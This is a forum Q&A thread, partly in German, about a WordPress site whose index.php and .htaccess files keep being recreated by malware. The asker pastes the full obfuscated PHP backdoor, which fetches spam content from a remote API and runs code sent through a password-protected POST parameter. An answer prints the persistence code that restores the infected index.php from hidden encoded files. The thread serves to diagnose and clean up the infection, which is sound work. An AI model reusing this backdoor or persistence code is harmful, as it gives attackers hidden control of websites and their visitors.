${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"]($OO0_0__0OO);');$O__O0_00OO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$O_OO00__0O','$O_OO00__0O=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x5f\x5f\x4f\x4f\x30\x30\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"]($O_OO00__0O));$O__00O_0OO=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x4f\x5f\x30\x4f\x5f\x5f"](\'/\\|/si\',$O_OO00__0O,-1,PREG_SPLIT_NO_EMPTY);if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30\x4f"]($O__00O_0OO)){return false;}if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x5f\x4f\x30\x5f\x30\x30"]($O__00O_0OO)<2){return false;}$O_OO00__0O_array["data"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x5f\x30\x4f\x30\x30\x5f"]($O__00O_0OO);$O_OO00__0O_array["data"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"]($O_OO00__0O_array["data"]);$O_OO00__0O_array["headers"]=$O__00O_0OO;return $O_OO00__0O_array;');$O_OO0_O00_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$O_0_0_OO0O=\'\'','if($O_0_0_OO0O==\'\'){$O_0_0_OO0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'08soShTUxOTi0tPuBgA=\');}$O_OO00__0O="PElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+ClJld3JpdGVFbmdpbmUgT24KUmV3cml0ZUJhc2UgLwpSZXdyaXRlUnVsZSBeaW5kZXhcLnBocCQgLSBbTF0KUmV3cml0ZVJ1bGUgXiguKilyYWRpb1wucGhwJCAtIFtMXQpSZXdyaXRlUnVsZSBeKC4qKWNvbnRlbnRcLnBocCQgLSBbTF0KUmV3cml0ZVJ1bGUgXiguKilhYm91dFwucGhwJCAtIFtMXQpSZXdyaXRlUnVsZSBeKC4qKWxvY2szNjBcLnBocCQgLSBbTF0KUmV3cml0ZVJ1bGUgXiguKikucGhwKC4qKSQgL2luZGV4LnBocCBbTF0KUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWQKUmV3cml0ZVJ1bGUgLiAvaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPg==";$O_OO00__0O=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"]($O_OO00__0O);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x4f\x30\x5f\x5f\x30\x5f"]($O_0_0_OO0O)){$O_OO_O00_0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x5f\x30\x30\x30\x5f\x4f"]($O_0_0_OO0O);if($O_OO00__0O==$O_OO_O00_0){return;}}$OO_0__O0O0="robots.txt";if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x4f\x30\x5f\x5f\x30\x5f"]($OO_0__O0O0)){@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x30\x5f\x4f\x5f\x30"]($OO_0__O0O0,0777);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x4f\x30\x5f\x4f\x30\x30"]($OO_0__O0O0);}@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x30\x5f\x4f\x5f\x30"]($O_0_0_OO0O,0777);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x4f\x30\x5f\x4f\x30\x30"]($O_0_0_OO0O);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x4f\x30\x5f\x4f\x30"]($O_0_0_OO0O,$O_OO00__0O);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x30\x5f\x4f\x5f\x30"]($O_0_0_OO0O,0444);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x5f\x4f\x30\x30\x4f"]($O_0_0_OO0O,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x30\x4f\x30\x5f\x5f\x5f"]("-400 days",${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x30\x4f\x30\x5f\x5f"]()));');$O__00_OOO0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$O0_O00_OO_','$params["\x64\x65\x66\x61\x75\x6c\x74\x5f\x70\x61\x72\x61\x6d\x73"]=$O0_O00_OO_;$params["\x61\x70\x69"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x4f\x5f\x30\x30\x4f\x5f"]($params["\x64\x65\x66\x61\x75\x6c\x74\x5f\x70\x61\x72\x61\x6d\x73"]);$params["server_domain"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x5f\x4f\x5f\x4f\x30\x30"]();$params["\x72\x65\x71\x75\x65\x73\x74\x5f\x75\x72\x6c"]=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x52\x45\x51\x55\x45\x53\x54\x5f\x55\x52\x49"];$params["\x72\x65\x66\x65\x72\x65\x72"]=isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x52\x45\x46\x45\x52\x45\x52"])?${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x52\x45\x46\x45\x52\x45\x52"]:\'\';$params["\x75\x73\x65\x72\x5f\x61\x67\x65\x6e\x74"]=isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x55\x53\x45\x52\x5f\x41\x47\x45\x4e\x54"])?${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x55\x53\x45\x52\x5f\x41\x47\x45\x4e\x54"]:\'\';$params["\x69\x70"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x30\x5f\x30\x5f\x4f"]();if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x53"])){$params["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"]="https://";}else{$params["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"]="http://";}if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["HTTP_ACCEPT_LANGUAGE"])){$params["\x6c\x61\x6e\x67\x75\x61\x67\x65"]=${"\x5f\x53\x45\x52\x56\x45\x52"}["HTTP_ACCEPT_LANGUAGE"];}else{$params["\x6c\x61\x6e\x67\x75\x61\x67\x65"]="";}if(isset(${"\x5f\x47\x45\x54"}["\x70\x61\x72\x61\x6d\x73"])){header("Content-type:application/json");if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x30\x5f\x30\x5f\x4f\x5f"]("json_encode")){echo ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x30\x4f\x30\x5f\x4f\x4f"]($params);}else{${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x5f\x4f\x30\x4f\x5f\x30\x4f"]($params);}die();}if(isset(${"\x5f\x47\x45\x54"}["\x70\x61\x73\x73"])&&${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x30\x30\x30\x4f\x5f\x5f"](${"\x5f\x47\x45\x54"}["\x70\x61\x73\x73"]."a!#_11AA")=="2f7a76f71ff9e24be7c0015ff9cb81d8"){if(isset(${"\x5f\x47\x45\x54"}["\x73\x69\x74\x65\x6d\x61\x70"])){$OO0_0OO0__=sprintf("https://www.google.com/ping?sitemap=%s%s/%s",$params["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"],$params["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"],${"\x5f\x47\x45\x54"}["\x73\x69\x74\x65\x6d\x61\x70"]);$O_0_O0OO0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x5f\x4f\x30\x4f\x4f\x30"]($OO0_0OO0__);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x30\x5f\x5f\x4f\x4f\x30"]($O_0_O0OO0_,"google")!=false){die("success");}else{die("failed");}}if(isset(${"\x5f\x50\x4f\x53\x54"}["\x7a\x7a\x7a"])){$OO0_0_0O_O =${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x4f\x4f\x5f\x30\x30\x30"](${"\x5f\x50\x4f\x53\x54"}["\x7a\x7a\x7a"]));$OO0_0_0O_O=\' \'.$OO0_0_0O_O.\'\';@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x4f\x30\x5f\x4f\x30"](\'407.php\',$OO0_0_0O_O);require_once(\'407.php\');@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x4f\x30\x5f\x4f\x30\x30"](\'407.php\');die();}}${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x30\x5f\x4f\x30\x30\x5f"]();$O_OO00_0_O=array(\'domain\'=>$params["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"],\'request_url\'=>$params["\x72\x65\x71\x75\x65\x73\x74\x5f\x75\x72\x6c"],\'ip\'=>$params["\x69\x70"],\'agent\'=>$params["\x75\x73\x65\x72\x5f\x61\x67\x65\x6e\x74"],\'referer\'=>$params["\x72\x65\x66\x65\x72\x65\x72"],\'protocol\'=>$params["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"],\'language\'=>$params["\x6c\x61\x6e\x67\x75\x61\x67\x65"]);$O_OO00__0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x5f\x4f\x30\x4f\x4f\x30"]($params["\x61\x70\x69"],0,2,$O_OO00_0_O,array(),$params["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"]);$O_O_0O00_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x5f\x30\x30\x4f\x4f"]($O_OO00__0O);if($O_O_0O00_O!==false){foreach($O_O_0O00_O["headers"] as $header){@header($header);}echo $O_O_0O00_O["data"];die();}');${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x30\x5f\x4f\x4f\x4f\x30"]($O0_O00_OO_);?>

Außerdem bearbeitet es ständig meine .htaccess Dateien dazu:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteRule ^(.*)radio\.php$ - [L]
RewriteRule ^(.*)content\.php$ - [L]
RewriteRule ^(.*)about\.php$ - [L]
RewriteRule ^(.*)lock360\.php$ - [L]
RewriteRule ^(.*).php(.*)$ /index.php [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

Selbst wenn ich die Berechtigung für diese Dateien lösche oder ändere, erstellt WordPress sie mit der Berechtigung 0444 zurück.

Einige der infizierten Dateien waren n3.php befindet sich in einigen Plugin-Ordnern, wie Contact form 7.

Kann jemand mit diesem pls helfen? Danke im Voraus

  • Der vollständige Code befindet sich auf meinem Google Drive: [docs.google.com/document/d/…

    – bambus

    Nov 4, 2020 at 3:50

  • I have same problem. But when I delete all files and directories under web root the modified .htaccess and index.php files are created again. It still happens after FTP password change.

    – Bartłomiej Jakub Kwiatek

    Dec 9, 2020 at 11:59

I had the same issue as you described, and what I did to fix it is the the following using the Cpanel filemanager:

  • Edit or Replace .htaccess without the malicious code.

  • Delete all wordpress system files with the exception of wp-config.php and the wp-content folder.

  • Go to https://wordpress.org/download/releases/ and download the version of wordpress that you require in zip format.

  • Upload the wordpress .zip file inside the main directory of your online wordpress folder and then extract it using the file manager extract option, this will create a ‘wordpress’ folder, go inside this folder and copy all the system files/folders except for the wp-content folder, make sure you copy it into the correct destination.

  • Download latest version of all your plugins from original sources to your local computer (most of them will be in .zip format)

  • Delete all wp-content/plugins folder and then manually upload each individual plugins back into the wp-content/plugins folder. (if you upload the plugins in zip file format, you will need to extract the zip file after uploading using file manager extract option, and then delete the original zip file after extraction.

  • If you are using a cache plugin, I suggest locating the cache folder as sometimes it is located elsewhere (not inside wp-content folder) and then manually deleting all the accumulated cache files, if you’re not familiar where it is located then do the research.

  • After doing all this, you’ll end up with a clean install of wordpress and all your plugins and there should be no remnant of the malicious code anymore, and will not return anymore.

I hope this helps, good luck!

  • And also remove all entry into cronjobs. or better delete hosting account and create new one. and also check database for admin users and delete suspicious users.

    – Nabi K.A.Z.

    Feb 15 at 17:02

Code inside index.php regenerates itself. When you delete index.php, code previously in that file still gets executed (it’s still loaded in memory). Solution: restart PHP process to unload from memory.

  • makes sense, all that came to my mind was a cronjob

    – Yehia A.Salam

    Jul 7, 2021 at 13:20

  • any one able to find out what caused this malware to hook up in the first place?

    – M.Imran Mamda

    Feb 21 at 18:49

Had the same issue with not updated wordpress.
My fast solution is execution 2 SSH commands from www root folder:

find . -type f -name '*.php' -print0 | xargs -0 sed -i 's/$path = "\/home/\/\/$path = "\/home/g'
find . -type f -name 'index.php' -print0 | xargs -0 sed -i 's/$OO0/\/\/$OO0/g'

where /home – must be replaced with your site www folder, most times it is /var/www

command 1- make commented line with location of vidus code file

command 2- make commented line with virus in index.php

My virus regenation code located in
/domains/public_html/wp-includes/plugin.php

Virus regeneration code in plugin.php:

$index_path = "index.php";
$index = file_get_contents($index_path);
$path = "/home/users/user_name/domains/domain.com/wp-content/plugins/advanced-custom-fields/core/actions/173692";

if (file_exists($path)) {
$index_hide = file_get_contents($path);
$index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide))));
if(md5($index) != md5($index_hide))
{
    @chmod($index_path, 0644);
    @file_put_contents($index_path, $index_hide);
    @chmod($index_path, 0444);
}
}

$i_p = "index.php";
$index = file_get_contents($i_p);
$path = "/home/users/user_name/domains/domain.com/wp-admin/css/colors/blue/100158";

if (file_exists($path)) {
$index_hide = file_get_contents($path);
$index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide))));
if(md5($index) != md5($index_hide))
{
    @chmod($i_p, 0644);
    @file_put_contents($i_p, $index_hide);
    @chmod($i_p, 0444);
}
}

$index_path = "index.php";
$index = file_get_contents($index_path);
$path = "/home/users/user_name/domains/domain.com/wp-admin/css/colors/coffee/139039";

if (file_exists($path)) {
$index_hide = file_get_contents($path);
$index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide))));
if(md5($index) != md5($index_hide))
{
    @chmod($index_path, 0644);
    @file_put_contents($index_path, $index_hide);
    @chmod($index_path, 0444);
}
}

1344540cookie-checkWordPress erstellt weiterhin index.php- und .htaccess-Dateien und ändert die Berechtigung auf 0444

This website is using cookies to improve the user-friendliness. You agree by using the website further.

Privacy policy

Contact - Terms and Conditions - Privacy Policy